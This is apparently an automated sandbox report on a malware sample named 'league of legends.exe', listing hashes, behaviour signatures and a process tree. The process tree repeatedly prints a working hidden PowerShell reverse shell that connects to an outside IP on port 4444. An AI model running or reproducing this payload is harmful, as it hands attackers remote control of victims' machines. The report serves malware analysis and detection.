Analysis
-
max time kernel
1799s -
max time network
1799s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2024, 23:28
Behavioral task
behavioral1
Sample
league of legends.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
league of legends.exe
Resource
win10v2004-20240508-en
General
-
Target
league of legends.exe
-
Size
5.2MB
-
MD5
52c0e4218367789067b5fd8c7d13b5c9
-
SHA1
10a0b1b53e0447875404a0a4d813e02d78c1089e
-
SHA256
f29bb95cd3cc9507c6d056c5223ec9bf521c52e961a11f9ca779c430a6fb1b14
-
SHA512
c0b73db1a1bfa13e8b45d8291435b14a2d68b5f9854bef895ef1f3aa930d880ee76abf02a0a85968f7ba154915d6ae091836c1f72f5c7b26a79b007c4a120219
-
SSDEEP
98304:knwrufKIDTGpzoLLJ3TbwaVvrZE0I7yoFQK15W8ASLmbNYJERw1jrTHD1DlrY31:knwruiIm9onJ5hrZEnyiU8AdZYJERur0
Malware Config
Signatures
-
Loads dropped DLL 4 IoCs
pid Process 660 league of legends.exe 660 league of legends.exe 660 league of legends.exe 660 league of legends.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4460 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 864 wrote to memory of 660 864 league of legends.exe 92 PID 864 wrote to memory of 660 864 league of legends.exe 92 PID 660 wrote to memory of 2040 660 league of legends.exe 94 PID 660 wrote to memory of 2040 660 league of legends.exe 94 PID 660 wrote to memory of 648 660 league of legends.exe 108 PID 660 wrote to memory of 648 660 league of legends.exe 108 PID 660 wrote to memory of 2552 660 league of legends.exe 112 PID 660 wrote to memory of 2552 660 league of legends.exe 112 PID 660 wrote to memory of 4624 660 league of legends.exe 113 PID 660 wrote to memory of 4624 660 league of legends.exe 113 PID 660 wrote to memory of 4580 660 league of legends.exe 114 PID 660 wrote to memory of 4580 660 league of legends.exe 114 PID 660 wrote to memory of 60 660 league of legends.exe 115 PID 660 wrote to memory of 60 660 league of legends.exe 115 PID 660 wrote to memory of 2284 660 league of legends.exe 117 PID 660 wrote to memory of 2284 660 league of legends.exe 117 PID 660 wrote to memory of 904 660 league of legends.exe 119 PID 660 wrote to memory of 904 660 league of legends.exe 119 PID 660 wrote to memory of 3212 660 league of legends.exe 120 PID 660 wrote to memory of 3212 660 league of legends.exe 120 PID 660 wrote to memory of 2704 660 league of legends.exe 121 PID 660 wrote to memory of 2704 660 league of legends.exe 121 PID 660 wrote to memory of 1892 660 league of legends.exe 122 PID 660 wrote to memory of 1892 660 league of legends.exe 122 PID 660 wrote to memory of 1480 660 league of legends.exe 123 PID 660 wrote to memory of 1480 660 league of legends.exe 123 PID 660 wrote to memory of 3992 660 league of legends.exe 124 PID 660 wrote to memory of 3992 660 league of legends.exe 124 PID 660 wrote to memory of 1608 660 league of legends.exe 125 PID 660 wrote to memory of 1608 660 league of legends.exe 125 PID 660 wrote to memory of 1416 660 league of legends.exe 127 PID 660 wrote to memory of 1416 660 league of legends.exe 127 PID 660 wrote to memory of 1540 660 league of legends.exe 128 PID 660 wrote to memory of 1540 660 league of legends.exe 128 PID 660 wrote to memory of 1692 660 league of legends.exe 129 PID 660 wrote to memory of 1692 660 league of legends.exe 129 PID 660 wrote to memory of 4040 660 league of legends.exe 130 PID 660 wrote to memory of 4040 660 league of legends.exe 130 PID 660 wrote to memory of 3692 660 league of legends.exe 131 PID 660 wrote to memory of 3692 660 league of legends.exe 131 PID 660 wrote to memory of 4428 660 league of legends.exe 132 PID 660 wrote to memory of 4428 660 league of legends.exe 132 PID 660 wrote to memory of 648 660 league of legends.exe 138 PID 660 wrote to memory of 648 660 league of legends.exe 138 PID 660 wrote to memory of 4288 660 league of legends.exe 140 PID 660 wrote to memory of 4288 660 league of legends.exe 140 PID 660 wrote to memory of 3556 660 league of legends.exe 141 PID 660 wrote to memory of 3556 660 league of legends.exe 141 PID 660 wrote to memory of 3316 660 league of legends.exe 142 PID 660 wrote to memory of 3316 660 league of legends.exe 142 PID 660 wrote to memory of 2304 660 league of legends.exe 143 PID 660 wrote to memory of 2304 660 league of legends.exe 143 PID 660 wrote to memory of 424 660 league of legends.exe 144 PID 660 wrote to memory of 424 660 league of legends.exe 144 PID 660 wrote to memory of 2364 660 league of legends.exe 145 PID 660 wrote to memory of 2364 660 league of legends.exe 145 PID 660 wrote to memory of 4176 660 league of legends.exe 148 PID 660 wrote to memory of 4176 660 league of legends.exe 148 PID 660 wrote to memory of 5060 660 league of legends.exe 149 PID 660 wrote to memory of 5060 660 league of legends.exe 149 PID 660 wrote to memory of 5032 660 league of legends.exe 150 PID 660 wrote to memory of 5032 660 league of legends.exe 150 PID 660 wrote to memory of 3348 660 league of legends.exe 151 PID 660 wrote to memory of 3348 660 league of legends.exe 151
Processes
-
C:\Users\Admin\AppData\Local\Temp\league of legends.exe"C:\Users\Admin\AppData\Local\Temp\league of legends.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Users\Admin\AppData\Local\Temp\league of legends.exe"C:\Users\Admin\AppData\Local\Temp\league of legends.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2552
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:60
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4288
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5032
-
-
